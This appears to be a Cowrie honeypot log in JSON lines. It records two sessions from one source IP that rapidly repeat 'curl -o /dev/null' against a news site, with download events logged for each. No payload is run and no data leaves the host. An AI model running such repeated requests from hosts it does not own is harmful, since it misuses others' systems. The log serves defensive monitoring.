{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.387197Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.390264Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.427749Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.430017Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.464963Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.466207Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.470314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.471383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.472959Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.475103Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.511172Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.512352Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.532441Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.533504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.536123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.536815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.551024Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.552441Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.572971Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.573987Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.581333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.582198Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.598263Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.599501Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.608214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.609066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.618276Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.619296Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.639224Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.640530Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.643960Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.644876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.660592Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.661453Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.671824Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.679286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.680231Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.697716Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.699452Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.702732Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.703633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.719703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.720627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.739610Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.741301Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.745382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.746254Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.761935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.762858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.790310Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.791559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.793803Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.796540Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.805175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.806269Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.845194Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.846348Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.852867Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.854612Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.855488Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.857732Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.889904Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.891043Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.899643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.900525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.934840Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.936000Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.940207Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.941187Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.943068Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.944618Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.983100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.984344Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.988427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.989532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.028856Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.030115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.032031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.032972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.069651Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.071455Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.084564Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.085619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.088643Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.089937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.118394Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.120201Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.144619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.145892Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.170686Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.172844Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.215742Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.217944Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.265515Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.267307Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.269164Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.299763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.301337Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.306343Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.308426Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.317404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.318612Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.340216Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.342210Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.350595Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.352006Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.371477Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.372602Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.382113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.383240Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.391123Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.392485Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.411575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.412805Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.421824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.423012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.432759Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.435206Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.459399Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.460913Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.469573Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.470860Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.508158Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.509931Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
